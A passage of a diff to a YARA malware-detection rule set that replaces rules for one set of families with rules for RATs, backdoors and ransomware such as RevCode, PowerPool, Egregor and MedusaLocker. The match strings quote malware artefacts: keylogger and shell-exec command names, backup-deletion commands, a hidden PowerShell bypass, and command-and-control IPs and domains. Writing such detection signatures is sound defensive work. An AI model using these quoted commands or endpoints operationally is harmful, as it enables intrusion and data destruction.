"https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "4f750c871ee061ed2d5d1f68e6ac1f56b8127321cfc207e2dd1dbed9d9848ce5" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2271-L2281" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "29884dda4936016660f5d1e33ffcf97a20c7d3116483a5895a5e2a1dd4ac9e9f" score = 75 - quality = 25 + quality = 75 tags = "FILE" strings: - $s1 = "{%s-%d-%d}" fullword wide - $s2 = "update" fullword wide - $s3 = "https://" fullword wide - $s4 = "http://" fullword wide - $s5 = "configure" fullword ascii - $s6 = { 8d 4f 02 e8 8c ff ff ff 8b d8 81 fb 00 dc 00 00 } - $s7 = { 83 c1 02 e8 3c ff ff ff 8b c8 ba ff 03 00 00 8d } + $s1 = "DisableTrivet.dll" fullword ascii condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x5a4d and pe.is_dll() and all of ($s*) and (pe.exports("Ordinal") or pe.exports("Chechako") or pe.exports("Originator") or pe.exports("Repressions")) } import "pe" -rule DITEKSHEN_MALWARE_Win_Dlagent06 : FILE +rule DITEKSHEN_MALWARE_Win_Revcoderat : FILE { meta: - description = "Detects known downloader agent downloading encoded binaries in patches" + description = "Detects RevCode/WebMonitor RAT" author = "ditekSHen" - id = "00cb5184-b12d-5014-bee8-116cc72dfa47" - date = "2024-09-06" - modified = "2024-09-06" + id = "4acf6742-7f5c-5126-89cc-b39b1acd922e" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4593-L4610" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "9188804ad0e08f3e0cd09eb8815abea14da5aa28aef9084d19108a24f49f65c7" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2283-L2332" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "e5bf1ce79b7955f597df1a9e361a3be892de55cd3db767278d4ccc02ace9e9f5" score = 75 - quality = 75 + quality = 48 tags = "FILE" - snort2_sid = "920122" - snort3_sid = "920119" + snort2_sid = "920070" + snort3_sid = "920070" + clamav_sig = "MALWARE.Win.Trojan.RevCodeRAT" strings: - $s1 = "totallist" fullword ascii wide - $s2 = "LINKS_HERE" fullword wide - $s3 = "[SPLITTER]" fullword wide - $var2_1 = "DownloadWeb" fullword ascii - $var2_2 = "WriteByte" fullword ascii - $var2_3 = "MemoryStream" fullword ascii - $var2_4 = "DownloadString" fullword ascii - $var2_5 = "WebClient" fullword ascii + $x1 = "rev-novm.dat" fullword wide + $x2 = "WebMonitor-" fullword wide + $x3 = "WebMonitor Client" fullword wide + $x4 = "Launch WebMonitor" fullword wide + $s1 = "KEYLOG_DEL" fullword ascii + $s2 = "KEYLOG_STREAM_START" fullword ascii + $s3 = "send_keylog_del" fullword ascii + $s4 = "send_keylog_stream_" ascii + $s5 = "send_shell_exec" fullword ascii + $s6 = "send_file_download_exec" fullword ascii + $s7 = "send_pdg_exec" fullword ascii + $s8 = "send_app_cmd_upd" fullword ascii + $s9 = "send_webcamstream_start" fullword ascii + $s10 = "send_screenstream_start" fullword ascii + $s11 = "send_clipboard_get" fullword ascii + $s12 = "send_pdg_rev_proxy_stop" fullword ascii + $s13 = "send_shell_stop" fullword ascii + $s14 = "send_wnd_cmd" fullword ascii + $s15 = "SCREEN_STREAM_LEGACY(): Started..." fullword ascii + $s16 = "SYSTEM_INFORMATION(): Failed! (Error:" fullword ascii + $s17 = "TARGET_HOST_UPDATE(): Sync successful!" fullword ascii + $s18 = "PLUGIN_PROCESS_REVERSE_PROXY: Plugin" ascii + $s19 = "PLUGIN_PROCESS: Plugin" ascii + $s20 = "PLUGIN_EXEC: Plugin" ascii + $s21 = "PLUGIN_PROCESS_SCREEN_STREAM: Plugin" ascii + $cnc1 = "?task_id=" fullword ascii + $cnc2 = "&operation=" fullword ascii + $cnc3 = "&filesize=" fullword ascii + $cnc4 = "pos=" fullword ascii + $cnc5 = "&mode=" fullword ascii + $cnc6 = "&cmp=1" fullword ascii + $cnc7 = "&cmp=0" fullword ascii + $cnc8 = "&enc=1" fullword ascii + $cnc9 = "&enc=0" fullword ascii + $cnc10 = "&user=" fullword ascii + $cnc11 = "&uid=" fullword ascii + $cnc12 = "&key=" fullword ascii condition: - uint16(0)==0x5a4d and (( all of ($s*) and 2 of ($var2*)) or (4 of ($var2*) and 2 of ($s*))) + uint16(0)==0x5a4d and (3 of ($x*) or all of ($cnc*) or 8 of ($s*) or (1 of ($x*) and 6 of ($s*)) or (6 of ($cnc*) and 6 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_PWSH_Poshkeylogger +rule DITEKSHEN_MALWARE_Win_Powerpool_STG1 : FILE { meta: - description = "Detects PowerShell PoshKeylogger" + description = "Detects first stage PowerPool backdoor" author = "ditekSHen" - id = "a816d716-caeb-5f08-9043-29db531f9e7c" - date = "2024-09-06" - modified = "2024-09-06" + id = "8531c22d-8d71-5794-b9c8-0a4cd81bb2b0" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4612-L4627" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "20bde87ded7e3b68bc554c4b9a6c2ef08514f0d47b6b144763927bede81ea540" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2334-L2361" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "9ab00d6e3007743a8bb30fbcdb435ac49101b52face55549ae454c64345caff9" score = 75 quality = 75 - tags = "" + tags = "FILE" + snort2_sid = "920088" + snort3_sid = "920086" + clamav_sig = "MALWARE.Win.Trojan.PowerPool-STG-1" strings: - $s1 = "::GetKeyboardState" ascii - $s2 = "GetAsyncKeyState(" ascii - $s3 = "::MapVirtualKey(" ascii - $s4 = "::GetAsyncKeyState" ascii - $s5 = "Start-Sleep" ascii - $s6 = "send-mailmessage" ascii - $s7 = "[System.IO.File]::AppendAllText($" ascii - $s8 = "new-object Management.Automation.PSCredential $" ascii + $s1 = "cmd /c powershell.exe $PSVersionTable.PSVersion > \"%s\"" fullword wide + $s2 = "cmd /c powershell.exe \"%s\" > \"%s\"" fullword wide + $s3 = "rar.exe a -r %s.rar -ta%04d%02d%02d%02d%02d%02d -tb%04d%02d%02d%02d%02d%02d" fullword wide + $s4 = "MyDemonMutex%d" fullword wide + $s5 = "MyScreen.jpg" fullword wide + $s6 = "proxy.log" fullword wide + $s7 = "myjt.exe" fullword wide + $s8 = "/?id=%s&info=%s" fullword wide + $s9 = "auto.cfg" fullword ascii + $s10 = "Mozilla/5.0 (Windows NT 6.1; WOW64)" fullword wide + $s11 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)" fullword wide + $s12 = "CMD COMMAND EXCUTE ERROR!" fullword ascii + $c1 = "run.afishaonline.eu" fullword wide + $c2 = "home.Sports-Collectors.com" fullword wide + $c3 = "about.Sports-Collectors.com" fullword + $c4 = "179.43.158.15" fullword wide + $c5 = "185.227.82.35" fullword wide condition: - 6 of them + uint16(0)==0x5a4d and ( all of ($s*) or (1 of ($c*) and 5 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Fujinamarat : FILE +rule DITEKSHEN_MALWARE_Win_Powerpool_STG2 : FILE { meta: - description = "Detects FujinamaRAT" + description = "Detects second stage PowerPool backdoor" author = "ditekSHen" - id = "f6b08713-1c03-5914-b0a2-ea9164a3f2cb" - date = "2024-09-06" - modified = "2024-09-06" + id = "1a059900-3292-5419-a143-caea3e710191" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4629-L4645" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "42557094afe67196442f46d76f156c09852d694bcc5f03eac51e79ad247c2fdd" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2363-L2395" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b80712bab281dbde816e2eda6ab1b4a9e21be26578fb755a1e1e1635675aa911" score = 75 - quality = 75 + quality = 73 tags = "FILE" - snort2_sid = "920124" - snort3_sid = "920121" + snort2_sid = "920089-920091" + snort3_sid = "920087-920089" + clamav_sig = "MALWARE.Win.Trojan.PowerPool-STG-2" strings: - $s1 = "GetAsyncKeyState" fullword ascii - $s2 = "HTTP/1.0" fullword wide - $s3 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" fullword wide - $s4 = "frmMain" fullword ascii - $s5 = "G<=>?@ABGGGGGGGGGGGGGGGGGGGGGGGGGGCDEF" fullword ascii - $s6 = "VBA6.DLL" fullword ascii - $s7 = "t_save" fullword ascii + $s1 = "write info fail!!! GetLastError-->%u" fullword ascii + $s2 = "LookupAccountSid Error %u" fullword ascii + $s3 = "Mozilla/4.0 (compatible; )" fullword ascii + $s4 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)" fullword ascii + $s5 = "Content-Disposition: form-data; name=\"%s\"" fullword ascii + $s6 = "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"" fullword ascii + $s7 = "Content-Type: multipart/form-data; boundary=--MULTI-PARTS-FORM-DATA-BOUNDARY" fullword ascii + $s8 = "in Json::Value::find" fullword ascii + $s9 = "in Json::Value::resolveReference" fullword ascii + $s10 = "in Json::Value::duplicateAndPrefixStringValue" fullword ascii + $s11 = ".?AVLogicError@Json@@" fullword ascii + $s12 = ".?AVRuntimeError@Json@@" fullword ascii + $s13 = "http:\\\\82.221.101.157:80" ascii + $s14 = "http://172.223.112.130:80" ascii + $s15 = "http://172.223.112.130:443" ascii + $s16 = "http://info.newsrental.net:80" ascii + $s17 = "%s|%I64d" ascii + $s18 = "open internet failed..." ascii + $s19 = "connect failed..." ascii + $s20 = "handle not opened..." ascii + $s21 = "corrupted regex pattern" fullword ascii + $s22 = "add cookie failed..." ascii condition: - uint16(0)==0x5a4d and 6 of them + uint16(0)==0x5a4d and 14 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Phorpiex : FILE +rule DITEKSHEN_MALWARE_Win_Egregor : FILE { meta: - description = "Detects Phorpiex variants" + description = "Detects Egregor ransomware variants" author = "ditekSHen" - id = "e2d26c5f-939e-53e3-8730-622341d26273" - date = "2024-09-06" - modified = "2024-09-06" + id = "2e24d4ec-39c2-5148-80a1-04f96bc8b477" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4647-L4666" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "4c48a20aaf37d65471710181238d2c39c1cb0fc5a37b9c411e8d4dcfd7a9e26e" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2397-L2434" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "d39a7bf89a7574f7dfe56db78c8cdbbee97782f829805d4ee87fd9f1635154cd" score = 75 quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Ransomware.Egregor" strings: - $s1 = "ShEllExECutE=__\\DriveMgr.exe" fullword wide nocase - $s2 = "/c start __ & __\\DriveMgr.exe & exit" fullword wide nocase - $s3 = "%s\\autorun.inf" fullword wide - $s4 = "svchost." wide - $s5 = "%ls\\%d%d" wide - $s6 = "bitcoincash:" ascii - $s7 = "%ls:*:Enabled:%ls" fullword wide - $s8 = "%s\\%s\\DriveMgr.exe" fullword wide - $s9 = "api.wipmania.com" ascii - $v1_1 = "%appdata%" fullword wide - $v1_2 = "(iPhone;" ascii - $v1_3 = "/tst.php" ascii + $s1 = "C:\\Logmein\\{888-8888-9999}\\Logmein.log" fullword wide + $p1 = "--deinstall" fullword wide + $p2 = "--del" fullword wide + $p3 = "--exit" fullword wide + $p4 = "--kill" fullword wide + $p5 = "--loud" fullword wide + $p6 = "--nooperation" fullword wide + $p7 = "--nop" fullword wide + $p8 = "--skip" fullword wide + $p9 = "--useless" fullword wide + $p10 = "--yourmommy" fullword wide + $p11 = "-passegregor" ascii wide + $p12 = "-peguard" ascii wide + $p13 = "--nomimikatz" ascii wide + $p14 = "--multiproc" ascii wide + $p15 = "--killrdp" ascii wide + $p16 = "--nonet" ascii wide + $p17 = "--norename" ascii wide + $p18 = "--greetings" ascii wide condition: - uint16(0)==0x5a4d and (5 of ($s*) or all of ($v1*)) + ( uint16(0)==0x5a4d and pe.is_dll() and (( all of ($s*) and 1 of ($p*)) or (2 of them and filesize <1000KB and for any i in (0..pe.number_of_sections) : ((pe.sections[i].name==".00cfg"))))) or 8 of ($p*) } import "pe" -rule DITEKSHEN_MALWARE_Win_EXEPWSH_Dlagent : FILE +rule DITEKSHEN_MALWARE_Win_Redlinedropperexe : FILE { meta: - description = "Detects SystemBC" + description = "Detects executables dropping RedLine infostealer" author = "ditekSHen" - id = "f5e7490f-806c-52d2-8f1c-9e00ab3e2780" - date = "2024-09-06" - modified = "2024-09-06" + id = "364ba540-60a5-5e1b-bb21-505a442eabb6" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4668-L4687" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "6380359db1ac775cea3ebb93f7cf22a92d2f2e634c6aa724e2814c10d4ed42f5" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2461-L2484" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "cd1fb4a1d0883221dbdcc519db7f54b0f7285e8a19201dbc586c2520e8086bc2" score = 75 quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.RedLineDropper-EXE" strings: - $pwsh = "powershell" fullword ascii - $bitstansfer = "Start-BitsTransfer" ascii wide - $s1 = "GET %s HTTP/1" ascii - $s2 = "User-Agent:" ascii - $s3 = "-WindowStyle Hidden -ep bypass -file \"" fullword ascii - $s4 = "LdrLoadDll" fullword ascii - $v1 = "BEGINDATA" fullword ascii - $v2 = /HOST\d:/ ascii - $v3 = /PORT\d:/ ascii - $v4 = "TOR:" fullword ascii - $v5 = "Fwow64" fullword ascii - $v6 = "start" fullword ascii + $s1 = "Wizutezinod togeto0Rowadufevomuki futenujilazem jic lefogatenezinor" fullword wide + $s2 = "6Tatafamobevofaj bizafoju peyovavacoco lizine kezakajuj" fullword wide + $s3 = "Lawuherusozeru kucu zam0Zorizeyuk lepaposupu gala kinarusot ruvasaxehuwo" fullword wide + $s4 = "ClearEventLogW" fullword ascii + $s5 = "ProductionVersion" fullword wide + $s6 = "Vasuko)Yugenizugilobo toxocivoriye yexozoyohuzeb" wide + $s7 = "Yikezevavuzus gucajanesan#Rolapucededoxu xewulep fuwehofiwifi" wide condition: - uint16(0)==0x5a4d and (($pwsh and ($bitstansfer or 2 of ($s*))) or (5 of ($v*))) + uint16(0)==0x5a4d and (pe.exports("_fgeek@8") and 2 of them ) or (2 of them and for any i in (0..pe.number_of_sections) : ((pe.sections[i].name==".rig"))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Hdlocker : FILE +rule DITEKSHEN_MALWARE_Win_Nibiru : FILE { meta: - description = "Detects HDLocker ransomware" + description = "Detects Nibiru ransomware" author = "ditekSHen" - id = "03ada32b-6ef5-5600-954b-e9f430c6ff2d" - date = "2024-09-06" - modified = "2024-09-06" + id = "78c3bf75-1ab3-5f88-ba4b-d5a0a906d57c" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4689-L4703" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "337678a4a780947841a19c401601f1be7218276c8d4161229567dc4d6026b16a" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2486-L2504" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "f3718e9091b09e0f47ecd6715a3a2c160ede6ab9fb144e7ed115dd5a25c8e379" score = 75 - quality = 50 + quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Ransomware.Nibiru" strings: - $s1 = "HDLocker_" fullword ascii - $s2 = ".log" fullword ascii - $s3 = "Scripting.FileSystemObject" fullword ascii - $s4 = "Boot" fullword ascii - $s5 = "hellwdo" fullword ascii - $s6 = "blackmoon" fullword ascii - $s7 = "BlackMoon RunTime Error:" ascii + $s1 = ".encrypt" fullword wide + $s2 = "crypted" fullword wide + $s3 = ".Nibiru" fullword wide + $s4 = "Encryption Complete" fullword wide + $s5 = "All your files,documents,important datas,mp4,mp3 and anything valuable" ascii + $s6 = "EncryptOrDecryptFile" fullword ascii + $s7 = "get_hacker" ascii + $s8 = "/C choice /C Y /N /D Y /T 3 & Del \"" fullword wide + $s9 = "Once You pay,you get the KEY to decrypt files" ascii + $pdb = "\\Projects\\Nibiru\\Nibiru\\obj\\x86\\Release\\Nibiru.pdb" ascii condition: - uint16(0)==0x5a4d and 5 of them + uint16(0)==0x5a4d and (7 of them or ($pdb and 2 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Vovalex : FILE +rule DITEKSHEN_MALWARE_Win_Medusalocker : FILE { meta: - description = "Detects Vovalex ransomware" - author = "ditekSHen" - id = "967af585-8a91-5ed0-8400-a8a24d95fd12" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects MedusaLocker ransomware" + author = "ditekshen" + id = "06b7645f-228d-5ec1-9b82-88caee447a5c" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4705-L4718" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "ea695521981f4b007eee50e95f7989dda1f07cc411c59450489bb17391ff29dc" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2506-L2537" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "0e2a0a9f12f550a5c6a11731710e0dc2c2e26d17f43d2385bf6e298518631771" score = 75 - quality = 75 + quality = 73 tags = "FILE" + clamav_sig = "MALWARE.Win.Ransomware.MedusaLocker" strings: - $s1 = "README.VOVALEX.txt" fullword ascii - $s2 = "\\src\\phobos\\std\\" ascii - $s3 = "LoadLibraryA(\"Advapi32.dll\")" fullword ascii - $s4 = "Failed to spawn process \"" fullword ascii - $s5 = "=== Bypassed ===" fullword ascii - $s6 = "If you don't know where to buy" ascii + $x1 = "\\MedusaLockerInfo\\MedusaLockerProject\\MedusaLocker\\Release\\MedusaLocker.pdb" ascii + $x2 = "SOFTWARE\\Medusa" wide + $x3 = "=?utf-8?B?0RFQctTF0YDQcNC60IXQvdC+IEludGVybmV0IED4cGxvseVyIDEz?=" ascii + $s1 = "Recovery_Instructions.mht" fullword wide + $s2 = "README_LOCK.TXT" fullword wide + $s3 = "C:\\Users\\Public\\Desktop" wide + $s4 = "[LOCKER] " wide + $s5 = "TmV3LUl0ZW0gJ2" ascii + $s6 = "<HEAD>=20" ascii + $s7 = "LIST OF ENCRYPTED FILES" ascii + $s8 = "KEY.FILE" ascii + $cmd1 = { 2f 00 63 00 20 00 64 00 65 00 6c 00 20 00 00 00 20 00 3e 00 3e 00 20 00 4e 00 55 00 4c 00 } + $cmd2 = "vssadmin.exe delete" wide nocase + $cmd3 = "bcdedit.exe /set {default}" wide + $cmd4 = "wbadmin delete systemstatebackup" wide nocase + $mut1 = "{8761ABBD-7F85-42EE-B272-A76179687C63}" fullword wide + $mut2 = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" fullword wide + $mut3 = "{6EDD6D74-C007-4E75-B76A-E5740995E24C}" fullword wide + $ext1 = { 2e 00 52 00 65 00 61 00 64 00 49 00 6e 00 73 00 + 74 00 72 00 75 00 63 00 74 00 69 00 6f 00 6e 00 + 73 00 00 00 00 00 00 00 2e 00 6b 00 65 00 76 00 + 65 00 72 00 73 00 65 00 6e } + $ext2 = ".exe,.dll,.sys,.ini,.lnk,.rdp,.encrypted" fullword ascii condition: - uint16(0)==0x5a4d and 4 of them + uint16(0)==0x5a4d and (2 of ($x*) or (1 of ($x*) and (4 of ($s*) or 1 of ($mut*))) or 6 of ($s*) or (1 of ($mut*) and 2 of ($cmd*)) or (1 of ($ext*) and 5 of them )) } import "pe" -rule DITEKSHEN_MALWARE_Win_Dharma : FILE +rule DITEKSHEN_MALWARE_Win_Ransomexx : FILE { meta: - description = "Detects Dharma ransomware" - author = "ditekSHen" - id = "070be95e-8d9c-5c4d-9d46-cddea6dbb682" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects RansomEXX ransomware" + author = "ditekshen" + id = "4d1294de-d73c-5f9c-adb7-18ce5b5aca9f" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4720-L4728" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "2727b2c0295e32699e08c3c79d7ac6fd52f1520358ac23290d40df428c969f4b" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2539-L2555" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "351398d89b847b3439fa58b7aab50f3c6e48be27877d3f8b85cc78e994413ecc" score = 75 quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Ransomware.RansomEXX" strings: - $s1 = "C:\\crysis\\Release\\PDB\\payload.pdb" fullword ascii + $id = "ransom.exx" ascii + $s1 = "!TXDOT_READ_ME!.txt" fullword wide + $s2 = "debug.txt" fullword wide + $s3 = ".txd0t" fullword wide + $s4 = "crypt_detect" fullword wide + $s5 = "powershell.exe" fullword wide + $s6 = "cipher.exe" fullword ascii wide + $s7 = "?ReflectiveLoader@@" ascii condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x5a4d and (($id and 3 of ($s*)) or all of ($*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Cryptolocker : FILE +rule DITEKSHEN_MALWARE_Win_Quasarstealer : FILE { meta: - description = "Detects Cryptolocker ransomware variants (Betarasite)" - author = "ditekSHen" - id = "4c6d714d-1fb1-55ce-8022-40f6f634e2cd" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects Quasar infostealer" + author = "ditekshen" + id = "d0d532fe-bd0a-560a-8570-f6038d694338" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4730-L4752" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "e1700e8ace338c25119305878e8bc52210506bd42183007985ba9601abdab87b" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2557-L2572" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "4b6ab49992db4d7bf4404d51b0ef1773249de89545ec31176ad45d00803ba703" score = 75 - quality = 73 + quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.QuasarStealer" strings: - $x1 = "CryptoLocker" fullword wide - $x2 = ".betarasite" fullword wide - $x3 = "CMSTPBypass" fullword ascii - $s1 = "CommandToExecute" fullword ascii - $s2 = "SetInfFile" fullword ascii - $s3 = "SchoolPrject1" ascii - $s4 = "$730d5f64-bd57-47c1-9af4-d20aec714d02" fullword ascii - $s5 = "Encrypt" fullword ascii - $s6 = "Invalide Key! Please Try Again." fullword wide - $s7 = "RegAsm" fullword wide - $s8 = "Your key will be destroyed" wide - $s9 = "encrypted using RC4 and RSA-2048" wide - $c1 = "https://coinbase.com" fullword wide - $c2 = "https://localbictoins.com" fullword wide - $c3 = "https://bitpanda.com" fullword wide + $s1 = "PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null" fullword ascii + $s2 = "DQuasar.Common, Version=1.4.0.0, Culture=neutral, PublicKeyToken=null" fullword ascii + $s3 = "Process already elevated." fullword wide + $s4 = "get_PotentiallyVulnerablePasswords" fullword ascii + $s5 = "GetKeyloggerLogsDirectory" ascii + $s6 = "set_PotentiallyVulnerablePasswords" fullword ascii + $s7 = "BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>" ascii condition: - uint16(0)==0x5a4d and ( all of ($x*) or all of ($s*) or (2 of ($x*) and 5 of ($s*)) or ( all of ($c*) and 1 of ($x*) and 2 of ($s*))) + uint16(0)==0x5a4d and 5 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_PWSH_Poshwifistealer +rule DITEKSHEN_MALWARE_Win_Bandook : FILE { meta: - description = "Detects PowerShell PoshWiFiStealer" - author = "ditekSHen" - id = "69ac123d-b746-57f1-a488-547f9a9cdd86" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects Bandook backdoor" + author = "ditekshen" + id = "c74bd688-c79e-5939-93a8-c2cd9f2cd60e" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4754-L4765" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "769349360b5d22226a5339a9e8471d06731dc522475c9385c1c145a0488e0ad1" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2676-L2705" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "bff09f769aae890d81efe9926cc8ce85c1caa4eeeb6bc7d2321d2d906ac8d6cf" score = 75 quality = 75 - tags = "" + tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.Bandook" strings: - $s1 = "netsh wlan export profile" ascii - $s2 = "Send-MailMessage" ascii - $u1 = "https://github.com/axel05869/Wifi-Grab" ascii - $u2 = "/exploitechx/wifi-password-extractor" ascii + $s1 = "\"%sLib\\dpx.pyc\" \"%ws\" \"%ws\" \"%ws\" \"%ws\" \"%ws\"" fullword wide + $s2 = "%s\\usd\\dv-%s.dat" fullword ascii + $s3 = "%sprd.dat" fullword ascii + $s4 = "%sfile\\shell\\open\\command" fullword ascii + $s5 = "explorer.exe , %s" fullword ascii + $f1 = "CaptureScreen" fullword ascii + $f2 = "StartShell" fullword ascii + $f3 = "ClearCred" fullword ascii + $f4 = "GrabFileFromDevice" fullword ascii + $f5 = "PutFileOnDevice" fullword ascii + $f6 = "ChromeInject" fullword ascii + $f7 = "StartFileMonitor" fullword ascii + $f8 = "DisableMouseCapture" fullword ascii + $f9 = "StealUSB" fullword ascii + $f10 = "DDOSON" fullword ascii + $f11 = "InstallMac" fullword ascii + $f12 = "SendCam" fullword ascii + $x1 = "RTC-TGUBP" fullword ascii + $x2 = "AVE_MARIA" fullword ascii condition: - all of ($s*) or all of ($u*) + uint16(0)==0x5a4d and ( all of ($s*) or 6 of ($f*) or (2 of ($s*) and 3 of ($f*)) or ( all of ($x*) and (2 of ($f*) or 3 of ($s*)))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Steamhook : FILE +rule DITEKSHEN_MALWARE_Win_Kimsuky : FILE { meta: - description = "Detects potential Steam stealer" - author = 